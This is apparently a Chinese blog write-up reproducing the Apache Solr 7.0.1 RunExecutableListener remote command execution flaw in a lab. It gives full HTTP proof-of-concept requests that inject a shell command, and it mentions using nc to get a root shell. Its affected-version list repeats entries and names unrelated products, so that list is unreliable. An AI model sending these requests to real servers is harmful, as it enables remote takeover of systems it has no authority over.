漏洞介绍
Apache Solr
Apache Solr是一个来自Apache Lucene(Lucene是一个开源的搜索引擎软件库),使用Java语言编写的开源的企业搜索平台,其主要功能包括全文搜索,实时索引,动态集群等功能。原理大致是文档通过HTTP利用XML加到一个搜索集合中,查询该集合也是通过HTTP收到一个XML/JSON响应来实现,在7.1.0及之前版本存在远程命令执行漏洞(RCE)。
Apache ZooKeeper
Apache ZooKeeper是一个Apache基金会的一个软件项目,用于提供分层的键值存储的分布式系统,主要用于为大型分布式系统提供分布式配置服务,同步服务和命名注册表。
影响版本
Apache Solr before 7.1和它之前的版本,包括:
RedhatSingle Sign-On 7.0
Redhat Linux 6.2 E sparc
Redhat Linux 6.2 E i386
Redhat Linux 6.2 E alpha
Redhat Linux 6.2 sparc
Redhat Linux 6.2 i386
Redhat Linux 6.2 alpha
Redhat JBoss Portal Platform 6
Redhat JBoss EAP 7 0
Redhat Jboss EAP 6
Redhat JBoss Data Grid 7.0.0
Redhat Enterprise Linux 6
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Redhat Collections for Red Hat EnterpriseLinux 0
Apache Solr 6.6.1
Apache Solr 6.6
Apache Solr 6.5.1
Apache Solr 6.5
Apache Solr 6.4
Apache Solr 6.3
Apache Solr 6.2
Apache Solr 6.6
Apache Solr 6.3
Apache Solr 6.0
ApacheLucene 0
环境设置
Apache Solr 7.0.1
ZooKeeper 3.4.6
在漏洞利用之前需要创建一个集合,从8983端口进入solr界面
点击Core Admin界面创建一个集合
点击Add Core创建即可
漏洞利用
监听器执行PoC
POST /solr/new_core/config HTTP/1.1
Host: IP
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
更新配置PoC
POST /solr/new_core/update HTTP/1.1
Host: IP
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15
[{"id":"test"}]
这2个PoC需要配合着用,首先是监听器执行处注入命令
我这里直接用的nc命令,然后再用更新配置的PoC来更新监听器
用nc来连,能够获得root权限
614
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
